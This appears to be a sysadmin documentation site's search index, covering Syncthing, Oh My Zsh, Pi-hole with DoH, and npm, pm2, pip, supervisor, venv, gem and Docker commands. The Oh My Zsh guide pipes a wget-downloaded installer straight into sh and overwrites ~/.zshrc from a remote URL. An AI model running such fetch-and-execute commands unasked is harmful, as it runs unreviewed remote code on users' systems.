echo \"deb [signed-by=/usr/share/keyrings/syncthing-archive-keyring.gpg] https://apt.syncthing.net/ syncthing stable\" | sudo tee /etc/apt/sources.list.d/syncthing.list\n
Now we can update the package list and install Syncthing
sudo apt update\nsudo apt install syncthing\n
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#configuration-syncthing-as-a-service", "title": "Configuration Syncthing as a Service", "text": "Configuring Syncthing as a service will provide as the ability to start and stop and enable/disable the service at boot.
Create a systemd unit file for managing the Syncthing service.
nano /etc/systemd/system/syncthing@.service\n
In the next example we will be setting the Syncthing
service UI to listen on local host (127.0.0.1) and port 8384
Add the following lines to the syncthing@.service
:
[Unit]\nDescription=Syncthing - Open Source Continuous File Synchronization for %I\nDocumentation=man:syncthing(1)\nAfter=network.target\n\n[Service]\nUser=%i\nExecStart=/usr/bin/syncthing -no-browser -gui-address=\"127.0.0.1:8384\" -no-restart -logflags=0\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target\n
Save and close the file when you are finished. Then, reload the systemd daemon to apply the configuration:
systemctl daemon-reload\n
Next, start the Syncthing service with the following command depending on a user this example is root
systemctl start syncthing@root\n
To verify the status of the Syncthing service, run the following command:
systemctl status syncthing@root\n
Finally, enabled the syncthing service on boot
systemctl enable syncthing@root\n
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#macos-installation", "title": "MacOS Installation", "text": "You can download the MacOS installation package from Syncthing Downloads, But my preferred way is to use the Homebrew package manager.
brew install --cask syncthing\n
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#windows-installation", "title": "Windows Installation", "text": "Window installation from Syncthing Downloads installs the Syncthing as a service without any system tray icon or menu.
The best way I found is to use SyncTrayzor
from SyncTrayzor Github Page. It hosts and wraps Syncthing, making it behave more like a native Windows application and less like a command-line utility with a web browser interface.
You can also install it with winget
with the following command:
winget install SyncTrayzor.SyncTrayzor\n
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#synology-dsm-installation", "title": "Synology DSM Installation", "text": "In order to install Syncthing, we need to add 3rd party packages to Synology DSM. Synology Community Packages provides packages for Synology-branded NAS devices.
After we added Synology Community Packages
you will be able to install Syncthing from the Community
tab.
Permissions for the Syncthing service will be handled by the new system user sc-syncthing
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#syncthing-configuration", "title": "Syncthing Configuration", "text": "The following configuration are the same for all the installation methods. I'm no going to cover the basic configuration, but I will show you some of my personal preferences.
First, to configure Syncthing we need to access its Web UI. The default URL is http://127.0.0.1:8384
If you are using Syncthing
on a remote Linux host, you can use an SSH tunnel to access the Web UI.
ssh -L 8001:127.0.0.1:8384 root@192.168.102.6\n
This will forward 127.0.0.1:8384
from the remote host to 127.0.0.1:8001
on the local host.
For security reasons, I like to disable all the Discovery and Relay services.
When you disable the Discovery service, you will have to manually add the connection to other devices.
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#manual-connection-example", "title": "Manual Connection Example", "text": "tcp://192.168.1.1:22000\n
or
tcp://example.com:22000\n
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/syncthings/#syncthing-files-ignore-patterns", "title": "Syncthing Files Ignore Patterns", "text": "Syncthing supports of Ignore Patterns
you can use it to Ignore Files
synchronization. This will save you a lot of headaches with sync errors
Here is a list of the Ignore Patterns
for system files:
// Apple macOS\n(?d).DS_Store\n(?d).localized\n(?d)._*\n(?d).Icon*\n(?d).fseventsd\n(?d).Spotlight-V100\n(?d).DocumentRevisions-V100\n(?d).TemporaryItems\n(?d).Trashes\n(?d).Trash-1000\n(?d).iCloud\n(?d)Photos Library.photoslibrary\n\n// GNU/Linux\n(?d).directory\n(?d).Trash-*\n\n// Microsoft Windows\n(?d)desktop.ini\n(?d)ehthumbs.db\n(?d)Thumbs.db\n(?d)$RECYCLE.BIN\n(?d)System Volume Information\n\n// QNAP QTS\n(?d).AppleDB\n(?d).@_thumb\n(?d).@__thumb\n\n// Synology DSM\n(?d)@eaDir\n\n// Adobe Lightroom\n*Previews.lrdata root-pixels.db\n\n// Dropbox\n.dropbox\n.dropbox.attr\n\n// Firefox & Chrome\n*.part\n*.crdownload\n\n// Microsoft Office\n~*\n\n// Parallels Desktop for Mac\n.parallels-vm-directory\n\n// Resilio Sync\n.sync\n*.bts\n*.!Sync\n.SyncID\n.SyncIgnore\n.SyncArchive\n*.SyncPart\n*.SyncTemp\n*.SyncOld\n\n// Temporary and backup files\n*.temporary\n*.tmp\n*._mp\n*.old\n*.syd\n*.dir\n*.gid\n*.chk\n*.dmp\n*.nch\n.*.swp\n*~\n\n// Vim\n*.*.sw[a-p]\n
Example of working Syncthing
Web UI:
", "tags": ["syncthing", "automation", "linux", "macos", "synology", "windows"]}, {"location": "automation/guides/better-terminal-experience/", "title": "Better Terminal Experience", "text": "", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#introduction", "title": "Introduction", "text": "I have been using terminal for a long time, it's one of my essential tools for my everyday work and hobbies. The default terminal experience is not very user friendly, and I find it sometimes frustrating to use for basic tasks. So I decided to improve my terminal experience for macOS and Linux without too much effort from the user side. This guide will help you to install and configure the **better terminal experience in less than 5 minutes.
Better Terminal Experience guide based on ZSH Shell with Oh My Zsh on top of it. Using built-in theme called Bira
, the zsh auto suggestions plugin that suggests commands as you type based on history and completions, and the zsh syntax highlighting plugin that highlights commands whilst they are typed at a zsh prompt into an interactive terminal.
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#whats-zsh", "title": "What's ZSH", "text": "Z-shell (Zsh) is a Unix shell that can be used as an interactive login shell and as a shell scripting command interpreter. Zsh is an enhanced Bourne shell with many enhancements, including some Bash, ksh and tcsh features.
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#whats-oh-my-zsh", "title": "What's Oh-My-Zsh", "text": "Oh My Zsh is an open source, community-driven framework for managing your zsh configuration.
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#installation", "title": "Installation", "text": "", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#requirements", "title": "Requirements", "text": " Install the following requirements packages with the following commands:
Linux apt exampleMacOS homebrew example apt install -y git zsh wget\n
brew install git wget zsh\n
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#oh-my-zsh", "title": "Oh My Zsh", "text": "We can proceed to install Oh My Zsh with the following command:
sh -c \"$(wget https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh -O -)\"\n
Answer Yes when asked to change the default shell to zsh.
Install Autosuggestions, Syntax-Highlighting Plugins using git clone:
git clone https://github.com/zsh-users/zsh-syntax-highlighting.git ~/.oh-my-zsh/custom/plugins/zsh-syntax-highlighting\ngit clone https://github.com/zsh-users/zsh-autosuggestions ~/.oh-my-zsh/custom/plugins/zsh-autosuggestions\n
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#configuration", "title": "Configuration", "text": "Oh My Zsh crates a default configuration file called .zshrc
in the user's home directory.
We need to edit the configuration file. You can use any editor to edit the file.
nano example:
nano ~/.zshrc\n
We need to add or change the following lines to the configuration file:
Find the theme and change it to bira
ZSH_THEME=\"bira\"\n
find the plugins
and change it to the following:
plugins=(git colored-man-pages docker docker-compose iterm2 node npm brew colorize macos pip pyenv virtualenv adb aws command-not-found zsh-autosuggestions zsh-syntax-highlighting)\n
The autosuggestions plugin has a bug with copy and paste so there is a workaround for that. Append the following to the end of the config to activate the workaround.
## Fix for Slow zsh-autosuggestions copy&paste\nautoload -Uz bracketed-paste-magic\nzle -N bracketed-paste bracketed-paste-magic\nzstyle ':bracketed-paste-magic' active-widgets '.self-*'\n
Save and exit the file. Open new terminal window and enjoy Better Terminal Experience!
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/better-terminal-experience/#bonus-personal-theme-preconfigured", "title": "Bonus: Personal Theme, preconfigured", "text": "I've made a personal theme 3os based on the Bira theme with some tweaks.
Danger
The following commands will overwrite your current config if exists.
Make sure you have a backup of your config before proceeding!!!
wget -O ~/.oh-my-zsh/themes/3os.zsh-theme https://3os.org/assets/zsh/3os.zsh-theme\nwget -O ~/.zshrc https://3os.org/assets/zsh/zshrc_config\n
", "tags": ["macos", "linux", "terminal", "zsh", "oh-my-zsh"]}, {"location": "automation/guides/pihole-doh/", "title": "Pi-hole as DNS Server with DNS over HTTPS (DOH) Based on Docker Containers", "text": "", "tags": ["pi-hole", "doh", "docker", "dns", "dns-over-https"]}, {"location": "automation/guides/pihole-doh/#whats-pi-hole", "title": "What's Pi-hole?", "text": "Pi-hole Official Website Official Website.
Pi-hole is a DNS server that is designed to block ads and trackers. It is a free and open source software project. It's based on blocklists and acts as a DNS sinkhole.
", "tags": ["pi-hole", "doh", "docker", "dns", "dns-over-https"]}, {"location": "automation/guides/pihole-doh/#whats-dns-over-https-doh", "title": "What's DNS over HTTPS (DOH)?", "text": "DNS over HTTPS (DoH) is an internet security protocol that communicates domain name server information in an encrypted way over HTTPS connections.
", "tags": ["pi-hole", "doh", "docker", "dns", "dns-over-https"]}, {"location": "automation/guides/pihole-doh/#my-pi-hole-setup", "title": "My Pi-hole Setup", "text": "My setup fully depends on pi-hole dns server, that's why I use two servers one as primary DNS Server and the second as secondary DNS server.
I've configured my router as a DNS server for all the DHCP clients with primary and the secondary DNS as my pi-hole servers. This way all the clients requests the router to resolve the DNS and the router forwards the request to the pi-hole servers.
Pi-hole-1 runs on ubuntu server (virtual machine) Pi-hole-2 runs on Raspberry Pi Warning
This is not a step by step guide for all the configurations of pihole or how to use docker containers. The following instructions include only the deployment of the pi-hole server with DoH providers.
", "tags": ["pi-hole", "doh", "docker", "dns", "dns-over-https"]}, {"location": "automation/guides/pihole-doh/#installation", "title": "Installation", "text": "We Will be using docker-compose
to deploy the pi-hole server with DoH providers with a single configuration file.
The following docker-compose.yml includes two images: Pi-hole container, and cloudflared container. When you run docker-compose up
the containers will be created and started. It will create an internal network for the pihole and two instances of cloudflared. When a request comes in, the pihole will forward the request to the cloudflared instances; one of them will use Cloudflare DNS servers and the other will use Google's DNS servers. There is no need to configure the pihole's DNS server at the UI since the configuration is done by the docker-compose.yml
file.
When using this setup two folders will be created on the Host machine for persistent storage of the containers: config, dnsmasq.d
. Those folders will be mounted to the containers when its running/restarted/recreated. Those folders will be created at the root folder of the docker-compose.yml file.
Create a folder for the deployment of the containers at your host machine. create a file named docker-compose.yml
at the root folder and copy the following content to it:
version: '2.4'\n\nservices:\npihole:\ncontainer_name: pihole\nhostname: pihole\nrestart: always\nimage: pihole/pihole\nnetworks:\ndns:\nipv4_address: 172.20.0.9\ndepends_on:\ngoogle-8.8.8.8:\ncondition: service_started\ncloudflare-1.1.1.1:\ncondition: service_started\nvolumes:\n- ./config:/etc/pihole/\n- ./dnsmasq.d:/etc/dnsmasq.d/\n- /etc/localtime:/etc/localtime\nports:\n- '7003:80'\n- '53:53/tcp'\n- '53:53/udp'\nenvironment:\n- ServerIP=127.0.0.1\n- WEBPASSWORD=ChangeMe\n- PIHOLE_DNS_=172.20.0.10;172.20.0.12\n\ncloudflare-1.1.1.1:\ncontainer_name: cloudflare-1.1.1.1\nhostname: cloudflare-1.1.1.1\nrestart: always\nimage: visibilityspots/cloudflared\nnetworks:\ndns:\nipv4_address: 172.20.0.10\nexpose:\n- '53/tcp'\n- '53/udp'\nenvironment:\n- PORT=53\n- UPSTREAM1=https://1.1.1.1/dns-query\n- UPSTREAM2=https://1.1.1.1/dns-query\nvolumes:\n- /etc/localtime:/etc/localtime\n\ngoogle-8.8.8.8:\ncontainer_name: google-8.8.8.8\nhostname: google-8.8.8.8\nrestart: always\nimage: visibilityspots/cloudflared\nnetworks:\ndns:\nipv4_address: 172.20.0.12\nexpose:\n- '53/tcp'\n- '53/udp'\nenvironment:\n- PORT=53\n- UPSTREAM1=https://8.8.8.8/dns-query\n- UPSTREAM2=https://8.8.8.8/dns-query\nvolumes:\n- /etc/localtime:/etc/localtime\n\nnetworks:\ndns:\nipam:\nconfig:\n- subnet: 172.20.0.0/24\n
Now run docker-compose up -d
to create the containers. If all went well you should be able to access the pihole server at http://127.0.0.1:7003
with password ChangeMe
from the config above.
Now you need to change your dns server to point to the pihole server. We are done with the installation.
", "tags": ["pi-hole", "doh", "docker", "dns", "dns-over-https"]}, {"location": "development/node-npm/npm/", "title": "Npm Command-line Utility", "text": "npm is two things: first and foremost, it is an online repository for the publishing of open-source Node.js projects; second, it is a command-line utility for interacting with said repository that aids in package installation, version management, and dependency management. A plethora of Node.js libraries and applications are published on npm, and many more are added every day.
", "tags": ["npm", "cheat-sheet", "node"]}, {"location": "development/node-npm/npm/#updating-node-npm-to-latest-stable-version", "title": "Updating Node & npm to Latest Stable Version", "text": "npm:
npm install -g npm\n
node:
npm cache clean -f\nnpm install -g n\nn stable\n
", "tags": ["npm", "cheat-sheet", "node"]}, {"location": "development/node-npm/npm/#updating-local-project-packages", "title": "Updating Local Project Packages", "text": "Navigate to the root directory of your project and ensure it contains a package.json In your project root directory, run:
npm update\n
To test the update, run the outdated
command. There should not be any output.
npm outdated\n
", "tags": ["npm", "cheat-sheet", "node"]}, {"location": "development/node-npm/npm/#updating-globally-installed-packages", "title": "Updating Globally-Installed Packages", "text": "To see which global packages need to be updated, on the command line, run:
npm outdated -g --depth=0\n
To update a single global package, on the command line, run:
npm update -g <package_name>\n
To update all global packages, on the command line, run:
npm update -g\n
", "tags": ["npm", "cheat-sheet", "node"]}, {"location": "development/node-npm/pm2/", "title": "PM2 - Node.js Process Manager", "text": "PM2 is a daemon process manager that will help you manage and keep your application online. Getting started with PM2 is straightforward, it is offered as a simple and intuitive CLI, installable via NPM.
Follow the official documentation for installation and usage instructions: PM2 Official Documentation
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#installation", "title": "Installation", "text": "The latest PM2 version is installable with NPM or Yarn:
npm install pm2@latest -g\n# or\nyarn global add pm2\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#start-an-application-with-pm2", "title": "Start An Application With PM2", "text": "The simplest way to start, daemonize and monitor your application is by using this command line:
pm2 start app.js\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#start-application-with-detailed-time-for-logs", "title": "Start Application With Detailed Time For Logs", "text": "pm2 start app.js --log-date-format \"YYYY-MM-DD HH:mm:ss\"\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#managing-processes", "title": "Managing Processes", "text": "Managing application state is simple here are the commands:
pm2 restart app_name\npm2 reload app_name\npm2 stop app_name\npm2 delete app_name\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#save-configuration-of-processes-to-pm2", "title": "Save Configuration of Processes to PM2", "text": "And to freeze a process list for automatic respawn:
pm2 save\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#list-managed-applications", "title": "List Managed Applications", "text": "List the status of all application managed by PM2:
pm2 [list|ls|status]\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#display-logs", "title": "Display Logs", "text": "To display logs in realtime for all processes managed by PM2, use the following command:
pm2 logs\n
To display logs in realtime for all processes managed by PM2, for last 200 lines use the following command:
pm2 logs --lines 200\n
To display logs in realtime for specific process, use the following command:
pm2 logs <app_name>/<id>\n
To display logs in realtime for specific process, for last 200 lines use the following command:
pm2 logs <app_name>/<id> --lines 200\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#auto-startup-pm2", "title": "Auto Startup PM2", "text": "Restarting PM2 with the processes you manage on server boot/reboot is critical. To solve this, just run this command to generate an active startup script:
pm2 startup\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#auto-startup-pm2-on-raspberry-pi", "title": "Auto Startup PM2 on Raspberry Pi", "text": "When using PM2 on Raspberry Pi. You will encounter a problem when you try to start pm2 with the default command.
sudo env PATH=$PATH:/usr/local/bin pm2 startup systemd -u pi --hp /home/pi\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/node-npm/pm2/#updating-pm2", "title": "Updating PM2", "text": "It's very useful to update PM2 to the latest version specially when you update your Node.js version. Since updating node usually will brake the pm2 process to function properly, you can use the following command to update PM2:
npm install pm2@latest -g\n
Then update the in-memory PM2:
pm2 update\n
You can also create an alias
to update PM2 with one command:
alias pm2update='npm install pm2@latest -g && pm2 update && pm2 save'\n
", "tags": ["npm", "node", "pm2", "cheat-sheet", "process-manager"]}, {"location": "development/python/pip/", "title": "Pip Python Package Manager Cheat Sheet", "text": "Pip is the package installer for Python. You can use it to install packages from the Python Package Index and other indexes.
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#list-installed-packages-with-pip", "title": "List Installed Packages With Pip", "text": "pip list\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#list-outdated-packages", "title": "List Outdated Packages", "text": "pip list --outdated\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#instal-or-update-package-to-specific-version", "title": "Instal Or Update Package To Specific Version", "text": "exmaple with MySQL_python package:
pip install MySQL_python==1.2.2\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#update-package-to-the-latest-avalable-version", "title": "Update Package To The Latest Avalable Version", "text": "exmaple with MySQL_python package:
pip install MySQL_python --upgrade\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#update-pip-itself", "title": "Update Pip Itself", "text": "pip install --upgrade pip\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#update-all-packages-installed-with-pip", "title": "Update All Packages Installed With Pip", "text": "pip list --outdated --format=freeze | grep -v '^\\-e' | cut -d = -f 1 | xargs -n1 pip install -U\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/pip/#generate-requirementstxt-for-a-project", "title": "Generate requirements.txt For a Project", "text": "Run this command at terminal at the root of the project:
pip freeze > requirements.txt\n
", "tags": ["python", "pip", "package-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/", "title": "Supervisor Python Processes Management", "text": "Supervisor is a client/server system that allows its users to monitor and control a number of processes on UNIX-like operating systems. Official Supervisord Docs.
Example of Supervisord Web UI listening on localhost:9999
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#tips-of-supervisor-usage", "title": "Tips of Supervisor Usage", "text": "Seeing all child processes running
supervisorctl -c /path/to/supervisord.conf\n
I find it helpful to create an alias in my bash profile for those 2 commands above so that I don't have to manually type -c
all the time
Example:
echo \"alias supervisord='supervisord -c /System/Volumes/Data/opt/homebrew/etc/supervisord.conf'\"\necho \"alias supervisorctl='supervisorctl -c /System/Volumes/Data/opt/homebrew/etc/supervisord.conf'\"\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#list-all-processes", "title": "List All Processes", "text": "You need to provide the path to the supervisor configuration file with - -c /path/to/supervisord.conf
supervisorctl -c /System/Volumes/Data/opt/homebrew/etc/supervisord.conf\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#reload-changes-from-config-file-to-supervisor", "title": "Reload Changes from Config File to Supervisor", "text": "supervisorctl reread\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#update-supervisor-configuration", "title": "Update Supervisor Configuration", "text": "supervisorctl update\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#macos-supervisor-installation", "title": "MacOS Supervisor Installation", "text": "Install with pip as system package:
brew install supervisor\n
The default location of the supervisor configuration file is at /System/Volumes/Data/opt/homebrew/etc/supervisord.conf
.
You can use a symbolic link to the configuration file to make it persistent. For example, you can move the configuration file to Dropbox folder and use a symbolic link to it.
Link the configuration file to the Dropbox folder:
rm -rf /System/Volumes/Data/opt/homebrew/etc/supervisord.conf\nln -s /Users/fire1ce/Dropbox/SettingsConfigs/supervisor/supervisord.conf /System/Volumes/Data/opt/homebrew/etc/supervisord.conf\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#start-supervisor-service-on-boot", "title": "Start Supervisor Service on Boot", "text": "In order to start the supervisor service on boot, we need to create a service file for MacOS.
sudo nano /Library/LaunchDaemons/com.agendaless.supervisord.plist\n
Append the following content to the file:
<!-- /Library/LaunchDaemons/com.agendaless.supervisord.plist -->\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n<dict>\n<key>KeepAlive</key>\n<dict>\n<key>SuccessfulExit</key>\n<false/>\n</dict>\n<key>Label</key>\n<string>com.agendaless.supervisord</string>\n<key>ProgramArguments</key>\n<array>\n<string>/opt/homebrew/bin/supervisord</string>\n<string>-n</string>\n<string>-c</string>\n<string>/System/Volumes/Data/opt/homebrew/etc/supervisord.conf</string>\n</array>\n<key>RunAtLoad</key>\n<true/>\n</dict>\n</plist>\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/supervisor/#supervisor-configuration-file-example-with-2-managed-processes", "title": "Supervisor Configuration File Example With 2 Managed Processes:", "text": "[unix_http_server]\nfile=/opt/homebrew/var/run/supervisor.sock # the path to the socket file\n\n\n[inet_http_server] # inet (TCP) server disabled by default\nport=127.0.0.1:9999 # ip_address:port specifier, *:port for all iface\n# username=user # default is no username (open server)\n# password=123 default is no password (open server)\n\n[supervisord]\nlogfile=/opt/homebrew/var/log/supervisord.log # main log file# default $CWD/supervisord.log\nlogfile_maxbytes=50MB # max main logfile bytes b4 rotation# default 50MB\nlogfile_backups=10 # # of main logfile backups# 0 means none, default 10\nloglevel=info # log level# default info# others: debug,warn,trace\npidfile=/opt/homebrew/var/run/supervisord.pid # supervisord pidfile# default supervisord.pid\nnodaemon=false # start in foreground if true# default false\nsilent=false # no logs to stdout if true# default false\nminfds=1024 # min. avail startup file descriptors# default 1024\nminprocs=200 # min. 
avail process descriptors#default 200\n\n[rpcinterface:supervisor]\nsupervisor.rpcinterface_factory = supervisor.rpcinterface:make_main_rpcinterface\n\n[supervisorctl]\nserverurl=unix:///opt/homebrew/var/run/supervisor.sock\n\n[include]\nfiles = /opt/homebrew/etc/supervisor.d/*.ini\n\n[program:macos-bt-connect-based-on-ip]\ncommand=/Users/fire1ce/.pyenv/versions/macos-bt-connect-based-on-ip/bin/python /Users/fire1ce/projects/macos-bt-connect-based-on-ip/macos-bt-connect-based-on-ip.py\ndirectory=/Users/fire1ce/projects/macos-bt-connect-based-on-ip\nuser=fire1ce\nautostart=true\nautorestart=true\nstartsecs=2\nstartretries=3\nstdout_logfile=/opt/homebrew/var/log/macos-bt-connect-based-on-ip.out.log\nstdout_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)\nstdout_logfile_backups=5 # # of stdout logfile backups (0 means none, default 10)\nstderr_logfile=/opt/homebrew/var/log/macos-bt-connect-based-on-ip.err.log\nstderr_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)\nstderr_logfile_backups=5 # # of stderr logfile backups (0 means none, default 10)\n\n\n[program:macos-screenlock-api]\ncommand=/Users/fire1ce/.pyenv/versions/macos-screenlock-api/bin/python /Users/fire1ce/projects/macos-screenlock-api/macos-screenlock-api.py\ndirectory=/Users/fire1ce/projects/macos-screenlock-api\nuser=fire1ce\nautostart=true\nautorestart=true\nstartsecs=2\nstartretries=3\nstdout_logfile=/opt/homebrew/var/log/macos-screenlock-api.out.log\nstdout_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)\nstdout_logfile_backups=5 # # of stdout logfile backups (0 means none, default 10)\nstderr_logfile=/opt/homebrew/var/log/macos-screenlock-api.err.log\nstderr_logfile_maxbytes=1MB # max # logfile bytes b4 rotation (default 50MB)\nstderr_logfile_backups=5 # # of stderr logfile backups (0 means none, default 10)\n
", "tags": ["python", "supervisor", "processes-manager", "cheat-sheet"]}, {"location": "development/python/virtualenv/", "title": "Python Virtual Environment", "text": "", "tags": ["python", "venv", "cheat-sheet"]}, {"location": "development/python/virtualenv/#about-python-virtual-environment-venv", "title": "About Python Virtual Environment - venv", "text": "venv is a tool to create isolated Python environments. Since Python 3.3, a subset of it has been integrated into the standard library under the venv module. The venv module provides support for creating lightweight \u201cvirtual environments\u201d with their own site directories, optionally isolated from system site directories. Each virtual environment has its own Python binary (which matches the version of the binary that was used to create this environment) and can have its own independent set of installed Python packages in its site directories.
", "tags": ["python", "venv", "cheat-sheet"]}, {"location": "development/python/virtualenv/#install-venv", "title": "Install venv", "text": "In order to install venv
, we need to install the following packages:
apt examplesudo apt install python3-venv\n
", "tags": ["python", "venv", "cheat-sheet"]}, {"location": "development/python/virtualenv/#initialization-of-a-virtual-environment", "title": "Initialization of a Virtual Environment", "text": "Go to the root destination of your project and run the following command:
python3 -m venv .venv\n
This will create a virtual environment in the current directory. The virtual environment folder will be named .venv
.
", "tags": ["python", "venv", "cheat-sheet"]}, {"location": "development/python/virtualenv/#activation-of-a-virtual-environment", "title": "Activation of a Virtual Environment", "text": "In order to activate a virtual environment, from the root directory of your project, run the following command:
source .venv/bin/activate\n
Check if the virtual environment is activated by running the following command:
which python\n
The output should be with ../.venv/bin/python
as the output.
Bonus:
You can add an alias to your bash profile to make it easier to activate the virtual environment:
alias activate='source .venv/bin/activate'\n
", "tags": ["python", "venv", "cheat-sheet"]}, {"location": "development/python/virtualenv/#deactivation-of-a-virtual-environment", "title": "Deactivation of a Virtual Environment", "text": "When you are done with the virtual environment, you can deactivate it by running the following command:
deactivate\n
Or alternatively you can exit the current shell.", "tags": ["python", "venv", "cheat-sheet"]}, {"location": "development/ruby/ruby/", "title": "Ruby Gem Package Manager", "text": "RubyGems is a package manager for the Ruby programming language that provides a standard format for distributing Ruby programs and libraries (in a self-contained format called a \"gem\"), a tool designed to easily manage the installation of gems, and a server for distributing them.
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#finding-installed-and-available-gems", "title": "Finding Installed And Available Gems", "text": "gem list\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#installing-new-gems", "title": "Installing New Gems", "text": "gem install rails_utils\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#removing-deleting-gems", "title": "Removing / Deleting Gems", "text": "gem uninstall rails_utils\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#finding-outdated-gems", "title": "Finding Outdated Gems", "text": "gem outdated\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#get-gem-ruby-environment-information", "title": "Get Gem & Ruby Environment Information", "text": "gem environment\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#update-all-the-gems", "title": "Update All the Gems", "text": "Install rubygems-update
gem install rubygems-update\n
Then run:
gem update --system\nupdate_rubygems\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "development/ruby/ruby/#reading-the-gem-documentation", "title": "Reading The Gem Documentation", "text": "One of the most handy and important things about gems is that they [should] come with good documentation to allow you to start working with them fast. The simplest way to go with documentation is to run a local server where you will have access to all installed gems\u2019 usage instructions.
Run the following to run a documentation server:
gem server\n
it will start a server on port 8808.
# Server started at http://0.0.0.0:8808\n
", "tags": ["ruby", "gem", "package-manager", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/", "title": "Common Docker Commands", "text": "This is a short summary of the most commonly used Docker commands. If you're new to Docker, or even experienced Docker, it can be helpful to have a quick reference to the most commonly used Docker commands for managing the Docker environment.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#show-all-containers-including-running-and-stopped", "title": "Show all Containers Including Running and Stopped", "text": "docker ps -a\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#show-docker-container-logs", "title": "Show Docker Container Logs", "text": "docker logs <container_id>\n
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#get-a-container-shell", "title": "Get A Container Shell", "text": "docker exec -it <container_id> /bin/bash\n
or
docker exec -it <container_id> /bin/sh\n
depending on the shells available on the Docker image.
", "tags": ["docker", "cheat-sheet"]}, {"location": "devops/docker/common-docker-commands/#stoping-containers", "title": "Stoping Containers", "text": "docker stop <container_id>\n
force stop with kill
docker kill <container_id>\n
